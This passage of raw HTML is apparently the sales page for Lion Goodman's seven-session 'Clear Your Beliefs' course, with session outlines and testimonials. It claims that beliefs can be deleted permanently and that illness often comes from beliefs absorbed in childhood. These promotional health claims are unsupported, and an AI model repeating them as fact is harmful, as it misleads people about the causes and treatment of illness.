have to offer.</em></strong></em></strong></li>\r\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\r\n</ul>\r\n</div>\r\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\r\n\r\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\r\n\r\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\r\n\r\n&nbsp;\r\n<h1>The Garden Of Your Mind</h1>\r\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\r\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\r\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\r\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\r\n&nbsp;\r\n<h1>Beliefs Reside In The Subconscious Mind</h1>\r\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\r\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\r\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\r\n\r\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\r\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\r\n\r\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\r\n\r\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\r\n\r\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\r\n\r\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\r\n\r\n&nbsp;\r\n<h1>Why Beliefs Are Difficult To Change</h1>\r\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\r\n\r\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\r\n\r\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\r\n\r\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\r\n\r\n&nbsp;\r\n<h1>Why We React The Way We Do</h1>\r\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\r\n\r\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\r\n<ul class="indented-img-left">\r\n	<li>Why did I say that?</li>\r\n	<li>What’s wrong with me?</li>\r\n	<li>Why didn’t I follow through?</li>\r\n	<li>Why did I react that way?</li>\r\n	<li>What the hell just happened?</li>\r\n</ul>\r\n<em>\r\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\r\n\r\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\r\n\r\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\r\n\r\n&nbsp;\r\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\r\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\r\n<ul class="indented">\r\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\r\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\r\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\r\n</ul>\r\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\r\n\r\n&nbsp;\r\n<h1>Here’s Some Good News</h1>\r\n<ul class="indented">\r\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\r\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\r\n</ul>\r\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\r\n\r\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\r\n\r\n&nbsp;\r\n<h1>Imagine The Life You Desire</h1>\r\n<strong>Can you imagine this?</strong>\r\n\r\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\r\n<ul class="indented-img-left">\r\n	<li>You''re no longer held back by old beliefs and stories.</li>\r\n	<li>There''s no resistance to doing what needs to be done.</li>\r\n	<li>You feel joy and positive energy as you move forward to create the life of your dreams.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\r\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\r\n\r\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\r\n\r\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\r\n\r\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\r\n\r\n&nbsp;\r\n<h1>Clear Whatever Is In The Way</h1>\r\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\r\n\r\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\r\n\r\n&nbsp;\r\n<h1>Is This A Guaranteed Cure-All?</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.\r\n\r\nNo technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.\r\n\r\nDuring the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs.  It takes some work, and it''s <em>very </em>effective.\r\n\r\n&nbsp;\r\n<h1>The Clear Your Beliefs program can:</h1>\r\n<ul class="indented">\r\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\r\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\r\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\r\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, we invite all aspects of you – mental, emotional, physical, and spiritual – to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\r\n\r\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\r\n\r\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\r\n<div class="icon_box">\r\n<h1>With This Methodology, You Can Finally:</h1>\r\n<ul class="check">\r\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="margin-right: -120px ! important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\r\n	<li>Remove resistance and barriers</li>\r\n	<li>Open doors to new opportunities</li>\r\n	<li>Eliminate pain and suffering from the past</li>\r\n	<li>Experience more fulfillment in your relationships</li>\r\n	<li>Attract more abundance and prosperity</li>\r\n	<li>Increase your energy, vitality, and productivity</li>\r\n</ul>\r\n</div>\r\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\r\n<div class="quot">\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\r\n<div style="text-align: right;"><strong>– G. J., software developer</strong></div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n</div>\r\n<div class="message_box">\r\n<h1>A Message from Lion Goodman...</h1>\r\nDear Explorer:\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\r\n\r\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\r\n\r\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\r\n\r\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\r\n\r\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\r\n\r\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\r\n\r\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\r\n\r\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\r\n\r\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\r\n\r\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\r\n\r\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\r\n\r\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\r\n\r\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. You also have the opportunity to work with a professional <em>Clear Your Beliefs Coach </em>in private sessions. Join me for seven sessions of deep healing and transformation. Clear your old beliefs, and create the life you want.\r\n\r\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\r\n\r\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs... In gratitude, and with warm wishes for your total success,\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\r\n\r\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Register Today and Discover What''s Possible</h1>\r\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful technique used by hundreds of coaches and therapists around the world.\r\n\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 1: </span> <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you. It’s time to discard them and clear some space!You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades. You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 1, you will:</strong>\r\n<ul>\r\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\r\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\r\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\r\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\r\n<div style="text-align: right;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 2: </span> <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child. What messages did your parents, caregivers, and siblings plant in your child brain that still affect you?In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.It’s time to haul them out, and toss them out! You don’t need them anymore. If you hear critical inner voices berating you, don’t miss this session. Rid yourself of those pesky critical voices along with the diapers!\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 2, you will:</strong>\r\n<ul>\r\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\r\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\r\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\r\n<div style="text-align: right;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div style="text-align: right;"></div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 3: </span> <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\r\n\r\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.<em>What are you capable of? </em> If your answer is “Anything...” you don’t need this session. But most of us think too small...\r\n\r\n</div>\r\n<div class="module_body">Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised. We let our negative beliefs stop us.You may hear internal voices say, <em>“What’s the use? You’ll fail anyway. You don’t deserve happiness. Look at you!” </em>We were shamed into thinking that we were less than others. We learned to compare ourselves to others – and we always lose that contest. Clear out any apparent limitations you''ve taken on, and find your true power to create what you want. Do whatever you need to do in order to achieve your vision.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 3, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\r\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\r\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\r\n<div style="text-align: right;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 4: </span> <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships. If you’re married, are you happy and secure? Or are you anxious about the future? If you’re not in a relationship, what’s holding you back from finding your ideal mate?\r\n\r\nHumans are social creatures – we must relate to others to survive. At our core, we want a security and safety, but we also want passion and romance. You learned “what love is” from your parents – so it’s no wonder that you’re confused! Most of us repeat patterns we learned from our early childhood. We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like. Love was contaminated by disdain, contempt, withdrawal, or abuse. We were programmed to repeat their patterns – without conscious choice. This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\r\n\r\n</div>\r\n&nbsp;\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 4, you will:</strong>\r\n<ul>\r\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\r\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\r\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\r\n<div style="text-align: right;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 5: </span> <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\r\n\r\nWhat do you believe about earning a living in today’s economy? Is money really the root of all evil?\r\n\r\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem. Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture. Can you see their influence?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 5, you will:</strong>\r\n<ul>\r\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\r\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\r\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\r\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\r\n<div style="text-align: right;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 6: </span> <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body. \r\n\r\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.What do you believe and perceive about your body? Your health? Your age? Your vitality? Your ability to heal? The future of your health?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 6, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and vibrant health</li>\r\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\r\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\r\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\r\n<div style="text-align: right;"><strong>~ T. L., Healer, Stamford, CT 